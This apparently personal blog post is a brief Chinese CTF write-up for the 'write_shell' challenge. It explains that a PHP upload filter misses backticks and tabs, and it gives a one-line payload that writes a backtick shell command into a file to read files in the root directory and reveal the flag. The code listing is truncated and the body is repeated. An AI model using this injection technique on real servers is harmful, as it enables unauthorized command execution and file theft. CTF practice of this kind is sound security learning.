[红明谷CTF 2021]write_shell
今天是考试日,但是还是得刷一题(虽然是签到题)
代码如下:
1 | <?php |
两个参数:action和data,第一个是用来确定方法,pwd获取upload得文件的路径(dir:显示目录的文件和子目录的列表),upload上传文件的内容,写入文件中,
过滤很多,但是没有过滤反引号``,空格可以用\t过滤
直接获取:
?action=upload&data==`cat\t/*`?>
在pwd的路径上访问,发现显示flag
今天是考试日,但是还是得刷一题(虽然是签到题)
代码如下:
1 | <?php |
两个参数:action和data,第一个是用来确定方法,pwd获取upload得文件的路径(dir:显示目录的文件和子目录的列表),upload上传文件的内容,写入文件中,
直接获取:
?action=upload&data==`cat\t/*`?>
在pwd的路径上访问,发现显示flag
Author: odiws
Permalink: http://odiws.github.io/2024/05/27/buuctf5%E6%9C%8827%E6%97%A5/
License: Copyright (c) 2019 CC-BY-NC-4.0 LICENSE
Slogan: Do you believe in DESTINY?